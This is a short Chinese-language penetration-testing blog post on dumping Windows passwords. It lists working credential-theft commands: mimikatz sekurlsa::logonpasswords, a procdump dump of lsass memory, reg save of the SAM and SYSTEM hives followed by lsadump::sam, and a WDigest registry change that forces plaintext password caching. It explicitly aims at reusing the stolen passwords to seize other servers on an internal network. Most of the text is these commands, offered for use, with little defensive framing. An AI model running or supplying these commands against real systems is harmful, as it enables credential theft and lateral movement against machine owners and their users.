windows密码获取

概述

渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。

windows密码获取方法

最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。
使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。

mimikatz直接获取

直接将mimikatz 上传到目标服务器,执行相关命令。

命令

privilege::debug   //提升至debug权限
sekurlsa::logonpasswords  //抓取密码

procdump + mimikatz

命令

procdump64.exe -accepteula  -ma lsass.exe lsass.dmp

下载到本地,mimikatz执行

sekurlsa::minidump

sekurlsa::logonpasswords full
注册表获取密码
reg save hklm\sam sam.hiv

reg save hklm\system sys.hiv

mimikatz 解密

lsadump::sam /system:sys.hiv /sam:sam.hiv

然后使用在线网站进行破解

https://www.objectif-securite.ch/

这里其实就是将sam 文件通过导出文件,然后解析。

mimikatz 直接获取sam 文件内的hash。

log res.txt

privilege::debug

token::elevate

lsadump::sam
注意事项

当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。

reg add hklm\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

参考

https://www.objectif-securite.ch/ophcrack
https://blog.csdn.net/Adminxe/article/details/105926959
https://blog.csdn.net/w1590191166/article/details/107350200
https://cloud.tencent.com/developer/article/1684021
https://zhuanlan.zhihu.com/p/58875844
https://times0ng.github.io/2018/04/20/Windows%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96%E6%80%BB%E7%BB%93/
https://www.secrss.com/articles/24903
https://www.jianshu.com/p/801ef84321ab
https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983/topic/5afbf818753289354cab7e3c

Guess you like

Origin blog.csdn.net/qingzhantianxia/article/details/119207849